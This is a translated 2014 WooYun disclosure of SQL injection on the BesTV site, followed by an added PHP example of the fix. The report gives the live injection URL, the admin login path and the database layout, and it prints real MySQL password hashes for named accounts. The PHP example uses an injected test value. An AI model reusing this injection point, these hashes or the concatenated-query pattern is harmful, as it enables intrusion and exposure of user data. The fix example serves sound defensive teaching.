Vulnerability summary

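Bug ID: wooyun-2014-074448

Title: SQL injection on the BesTV main site leads to a large leak of personal private information

Vendor: bestv.com.cn

Author: 金枪银矛小霸王

Submitted: 2014-08-31 23:17

Fixed: 2014-09-05 23:18

Disclosed: 2014-09-05 23:18

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]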


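Vulnerability details

Disclosure status:

2014-08-31: Details sent to the vendor; waiting for the vendor to respond
2014-09-05: The vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

Last one. After posting this I'm heading into my final year of high school, so I'll be on WooYun less.

Detailed description:

You run a video site, at the very least; how can you pay so little attention to website security?
Injection URL:

http://www.bestv.com.cn/index.php?m=content&c=index&a=lists&catid=27&modelid=11&platform=1

The platform parameter is not filtered strictly enough, which leads to the injection.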


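Naturally, I went looking for the admin back-end directory; after 10 minutes of searching I finally found it.
URL:

http://www.bestv.com.cn/phpsso_server/index.php?m=admin&c=login&a=init&forward=

I just don't know how you log in and publish content with no CAPTCHA. I couldn't manage it, otherwise I would have taken over your server long ago.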


Dumped the administrator accounts and passwords. This part is done well: none of them are weak passwords.

web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: ottcms
Table: v9_admin
[23 entries]


Dumped the hash values. Security here is also good: no weak passwords.

web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] bestvMan [1]:
password hash: *308E0040D04740266341C7B51EA90AB5DD334B64
[*] root [2]:
password hash: *5FD5A9C4D9F6AC4BD6EF3EDCB8374DDEE02C0D4F
password hash: NULL


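So I decided to look through your user information table. Hmm, more than 30,000 user records. Quite a lot (I only looked at the count and did not dump any further).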


There is one more place, related to Weibo; it should be the prize winners' information.


OK, I'll stop here.

Proof of vulnerability:

web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: ottcms
Table: v9_admin
[23 entries]

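Suggested fix:

#1 Password security is done well
#2 The site's overall architecture still has flaws, for example SQLi and so on
#3 Of course, filter the data that users submit
#4 I worked hard writing this up; I don't know whether there's a gift for me. A gift, please.

Copyright notice: when reposting, please credit the source 金枪银矛小霸王@乌云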
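
An added example, not part of the original report and not the site's own code: fix suggestion #3 applied to a numeric request parameter such as `platform`, with the concatenated query shown beside strict integer validation and a bound statement. The `content` table, its columns, the allowed platform IDs and the sample rows are assumptions constructed for illustration, and SQLite in memory stands in for MySQL so the script runs offline.

```php
<?php
// Added example, not the site's code. Table, columns, allowed platform IDs
// and rows are assumptions; the data below is constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE content (id INTEGER PRIMARY KEY, catid INTEGER, platform INTEGER, title TEXT)');
$db->exec("INSERT INTO content (catid, platform, title) VALUES
    (27, 1, 'clip A'), (27, 2, 'clip B'), (27, 3, 'internal draft')");

// Vulnerable pattern: request values are pasted into the SQL text, so
// whatever follows the leading digit is parsed as part of the statement.
function list_unsafe(PDO $db, $catid, $platform) {
    $sql = "SELECT title FROM content WHERE catid = $catid AND platform = $platform";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened, step 1: accept only a well-formed integer, optionally limited
// to an allowlist of known values.
function int_param($value, ?array $allowed = null) {
    $n = filter_var($value, FILTER_VALIDATE_INT);
    if ($n === false || ($allowed !== null && !in_array($n, $allowed, true))) {
        throw new InvalidArgumentException('invalid numeric parameter');
    }
    return $n;
}

// Hardened, step 2: bind the validated values as typed parameters; they
// never become part of the SQL text.
function list_safe(PDO $db, $catid, $platform) {
    $stmt = $db->prepare(
        'SELECT title FROM content WHERE catid = :catid AND platform = :platform');
    $stmt->bindValue(':catid', int_param($catid), PDO::PARAM_INT);
    $stmt->bindValue(':platform', int_param($platform, array(1, 2)), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$tampered = '1 OR 1=1'; // constructed non-numeric value for the comparison

print_r(list_unsafe($db, '27', '1'));
print_r(list_unsafe($db, '27', $tampered)); // WHERE clause no longer restricts by platform
print_r(list_safe($db, '27', '1'));
try {
    list_safe($db, '27', $tampered);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```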


Vulnerability response

Vendor response:

Severity: No impact; ignored by the vendor

Ignored at: 2014-09-05 23:18

Vendor reply:

Latest status:

None